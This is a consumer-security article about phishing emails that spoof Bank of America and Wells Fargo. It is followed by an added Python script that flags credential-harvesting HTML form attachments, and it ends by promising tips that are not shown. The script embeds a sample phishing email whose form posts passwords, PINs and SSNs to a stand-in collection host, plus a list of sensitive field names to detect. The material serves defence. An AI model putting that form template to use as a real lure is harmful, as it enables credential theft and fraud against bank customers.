Maybe you think you can spot scam emails by the broken English, the pleas to wire money via Western Union and the references to Nigerian princes. Think again. The latest phishing attacks are so well-crafted, they look exactly like emails you might receive from major banks like Wells Fargo and Bank of America, says Ondrej Krehel, information security officer at Identity Theft 911, Credit.com’s sister company.
“It’s very sophisticated,” Krehel says. “Hackers are creating these pages to look exactly like professionally crafted bank pages. So it does have the look and feel and touch of your bank’s website.”
One recent email was noteworthy simply because it managed to sneak past Identity Theft 911’s multiple firewalls and land in Krehel’s inbox. It appeared to come from Bank of America: the sender shown was a genuine no-reply address at the bank’s own domain (forged in the message’s From header), rather than an obvious giveaway like a Hotmail or Yahoo.com address.
Opening the email deploys no malware to steal the user’s passwords or snoop on her computer (such malicious code would likely have been blocked by Krehel’s firewall). Instead, the message informs the user that there has been a serious problem with her account and that she needs to complete and return the attached form.
“The text of the email is very well crafted,” Krehel says. “It looks like something Bank of America would actually send you.”
The scammers didn’t include any malware in the attachment either, since that too would sound alarms in the user’s antivirus software. Instead, the attachment is a form that looks just like one Bank of America itself would produce.
The real Bank of America logo appears across the top of the file, and clicking on it takes the user to the bank’s actual site. The color scheme, with red and grey horizontal ribbons and numbers in blue circles, precisely mimics the look of the bank’s other communications. Even the mix of input methods, with drop-down boxes, checkboxes and places to type in text, is crafted exactly like the real thing.
The hackers are so good, in fact, that they customize the attachments to different banks. Another attachment Krehel received a few months ago had the exact same level of detail, only it spoofed the look and feel of Wells Fargo’s website.
“This is about collecting users’ data, and not triggering any antivirus” software, Krehel says. “So it’s the user driving the action.”
The attachment asks users to input all the information about their accounts, including their passwords, PINs, birthdates, Social Security numbers, driver’s license numbers, and the maiden and middle name of their mothers, plus six different security challenge questions, such as “Your first pet’s name.”
This, actually, is one clue that it’s a scam, Krehel says. Banks may occasionally ask customers to verify information about a particular transaction. If you’ve never been to Hong Kong but your credit card suddenly goes on a shopping spree there, you might get a phone call from Bank of America, or an email asking you to call the bank. But banks never, ever, ask customers to confirm the security details of their accounts via email, whether in the message body or in an attached form.
“If they have a problem with the account itself, they’ll probably shut down the account entirely and call the person, or email them and ask them to call a secure number,” Krehel says.
Second, the sheer number of security questions should raise alarm bells in the user’s mind, Krehel says. The one purporting to be from Bank of America even asked for the user’s email password and their father’s middle name, information that Bank of America itself does not need to know.
“It’s just overkill, the number of questions asked in one email,” says Krehel.
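The two clues above, a form that asks for credentials and far too many challenge questions, plus the mismatch between the bank the form imitates and the place it actually sends the data, can be checked mechanically. The script below is an added example and is not code from the original article or from Identity Theft 911. It parses a constructed sample message (the sender address, the form’s action URL and the field names are assumptions for the example, not observed data), pulls out any HTML attachment, and reports the indicators a mail gateway or analyst would look for.

```python
"""Triage an e-mail for an HTML-form credential-harvesting attachment.

Added example, not code from the original article or from Identity Theft 911.
The message below is constructed for illustration; its sender, the form's
action URL and the field names are assumptions, not real observed data.
"""
import email
import email.utils
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a bank would never collect through an e-mailed form (assumed list).
SENSITIVE_FIELDS = {"password", "passwd", "pin", "ssn", "dob", "birthdate",
                    "license", "email_password", "mother_maiden"}
# Challenge-question fields are assumed to be named q1, q2, ... in this example.
CHALLENGE_RE = re.compile(r"^q\d+$")
MAX_CHALLENGE_QUESTIONS = 2   # more than this in one form is "overkill"

# Constructed sample: a spoofed bank sender with an attached HTML "form".
SAMPLE_EML = b"""From: Bank of America <no-reply@bankofamerica.com>
To: victim@example.com
Subject: Important: account verification required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

There has been a problem with your account. Complete and return the attached form.
--b1
Content-Type: text/html; name="BofA_Verification.html"
Content-Disposition: attachment; filename="BofA_Verification.html"

<html><body>
<a href="https://www.bankofamerica.com/"><img src="logo.png"></a>
<form method="post" action="http://verify-account-update.example.net/collect.php">
  Online ID <input name="userid">
  Passcode <input type="password" name="password">
  ATM PIN <input name="pin">
  SSN <input name="ssn">
  Mother's maiden name <input name="mother_maiden">
  Email password <input type="password" name="email_password">
  <select name="q1"><option>First pet's name</option></select><input name="a1">
  <select name="q2"><option>City of birth</option></select><input name="a2">
  <select name="q3"><option>First school</option></select><input name="a3">
</form></body></html>
--b1--
"""


class FormScanner(HTMLParser):
    """Collect form actions and input/select names from an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.fields = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            name = (a.get("name") or "").lower()
            if name:
                self.fields.append(name)


def triage(raw: bytes) -> dict:
    """Return the phishing indicators found in the message's HTML attachments."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    sender = email.utils.parseaddr(str(msg["From"]))[1]
    sender_domain = sender.rpartition("@")[2].lower()
    report = {"sender_domain": sender_domain, "form_hosts": [],
              "sensitive_fields": [], "challenge_questions": 0}
    indicators = set()
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        if not scanner.actions:
            continue
        indicators.add("html_form_attachment")
        for action in scanner.actions:
            host = (urlparse(action).hostname or "").lower()
            report["form_hosts"].append(host)
            # The form wears the bank's branding but posts somewhere else.
            if host and not (host == sender_domain or host.endswith("." + sender_domain)):
                indicators.add("form_posts_offsite")
        report["sensitive_fields"] += sorted(f for f in scanner.fields if f in SENSITIVE_FIELDS)
        report["challenge_questions"] += sum(1 for f in scanner.fields if CHALLENGE_RE.match(f))
    if report["sensitive_fields"]:
        indicators.add("asks_for_credentials")
    if report["challenge_questions"] > MAX_CHALLENGE_QUESTIONS:
        indicators.add("too_many_challenge_questions")
    report["indicators"] = sorted(indicators)
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

The sender-domain check is deliberately the weak link: a forged From header passes it, which is exactly why the form’s destination and the data it asks for carry more weight than the address the message claims to come from.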
The takeaway: Phishing scammers are getting a lot more sophisticated. Here are some tips to avoid getting scammed:
Image: zetrules, via Flickr.com